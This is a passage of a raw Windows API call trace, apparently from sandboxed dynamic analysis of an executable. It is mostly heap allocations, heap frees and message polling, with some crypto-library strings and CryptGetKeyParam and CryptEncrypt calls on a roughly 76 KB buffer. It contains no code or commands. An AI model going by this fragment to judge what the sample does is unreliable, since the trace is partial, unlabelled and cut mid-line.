| out: hHeap=0x770000) returned 1 [0032.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.111] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.112] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.113] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.116] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.116] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.116] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.117] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.117] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.117] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.117] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.117] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.117] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.118] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x12987, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x12990) returned 1 [0032.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.118] CharLowerBuffW (in: lpsz="byte[76177]", cchLength=0xb | out: lpsz="byte[76177]") returned 0xb [0032.118] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.120] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.120] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.120] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x12987, dwBufLen=0x12990 | out: pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x12990) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.121] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.121] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, 